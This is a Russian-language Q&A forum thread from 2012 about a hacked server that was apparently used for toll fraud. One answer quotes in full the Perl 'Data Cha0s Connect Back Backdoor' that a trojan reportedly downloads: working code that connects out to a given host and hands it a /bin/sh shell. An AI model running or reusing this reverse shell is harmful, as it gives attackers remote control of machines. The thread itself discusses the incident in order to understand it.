Троянчик worsyn скачивает такую херь:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
собственно после чего, он может сделать всё что хошь.. такой радмин получается
залазим, к примеу, так:
http://www.chovy.com/personal/simiens-crew-2005-how-they-did-it/
ответил
2012-04-08 13:23:32 +0400
um2010 2056 ● 70 ● 13 ● 55
А в логах-то что???
switch ( 2012-04-08 13:32:20 +0400 )редактироватьда в том то и дело что ничего особенного. ну после взлома слив ттрафика на платные номера.
meral ( 2012-04-08 13:48:55 +0400 )редактироватьСервер смотрел наружу сетевым интерфейсом?
switch ( 2012-04-08 14:04:08 +0400 )редактироватьэпический вопрос, в духе: а сервер был включен в розетку?
um2010 ( 2012-04-08 20:30:20 +0400 )редактироватьсервер был сам снаружи.
meral ( 2012-04-08 20:36:06 +0400 )редактировать